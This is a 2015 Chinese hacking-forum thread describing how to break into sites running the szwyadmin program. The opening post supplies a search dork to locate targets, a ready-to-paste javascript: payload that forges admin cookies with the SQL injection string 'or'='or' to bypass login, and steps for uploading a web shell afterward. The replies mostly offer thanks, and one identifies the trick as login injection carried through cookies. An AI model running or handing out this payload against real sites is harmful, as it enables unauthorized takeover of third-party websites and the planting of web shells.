社区首页 › 技术文章 › szwyadmin程序cookies欺骗漏洞拿shell

兜兜裹套套。 发表于 2015-6-25 16:40:13

szwyadmin程序cookies欺骗漏洞拿shell

关键字:inurl:szwyadmin/login.asp
任意打开一个搜索结果，打开登录界面后在地址栏中输入下面的代码：
javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); alert(document.cookie="adminpass="+escape("'or'='or'")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp";

后台拿 shell 的方法：
1、数据库备份拿shell
2、直接改配置之后，上传shell文件（成功极少）

wuyan 发表于 2015-6-25 19:59:38

这个说白了，就是登陆注入，只是把post方式转换成cookie注入

小路 发表于 2015-6-27 06:09:27

还是不错的哦，顶了

人=族 发表于 2015-6-27 22:22:05

不错         

admin1964 发表于 2015-6-27 23:36:16

感谢楼主的分享~

云游者 发表于 2015-6-28 01:05:28

Micah 发表于 2015-6-28 01:50:03

云游者 发表于 2015-6-28 02:39:38

还是不错的哦，顶了

fkqqxx 发表于 2015-6-28 04:08:37

wuyan 发表于 2015-6-25 19:59
这个说白了，就是登陆注入，只是把post方式转换成cookie注入

做个详细解释把，么么哒

arctic 发表于 2015-6-28 16:37:00

感谢楼主的分享~

查看完整版本: szwyadmin程序cookies欺骗漏洞拿shell